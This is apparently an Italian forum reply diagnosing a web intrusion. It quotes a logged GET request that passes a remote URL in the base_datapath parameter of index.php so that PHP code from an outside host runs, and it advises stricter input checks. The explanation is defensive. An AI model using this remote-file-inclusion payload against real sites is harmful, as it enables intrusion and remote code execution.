le mie sono ovviamente supposizioni ma penso siano plausibili...

Un richiesta GET per un indirizzo del genere:
/sito/news/index.php?config=1&base_datapath=http://dcorp.newinvest.com.br/list.txt?&chdir=/raid0/web/cnr/guest/noria/


richiama la tua pagina /sito/news/index.php e le passa i parametri config e base_datapath. Quest'ultimo probabilmente dovrebbe contenere l'indirizzo di un'altra cartella o pagina... evidentemente accetta un indirizzo web completo cosa è stata usata per richiamare codice php nocivo da un sito esterno. Vedi http://dcorp.newinvest.com.br/list...
Se digiti quell'indirizzo infatti ritorna puro codice php. Probabilmente la tua pagina index.php processa quel codice provocandone l'esecuzione locale. La soluzione sarebbe un check più stringente sui parametri passati... cosa sempre indispensabile per assicurare una buona sicurezza delle applicazioni web.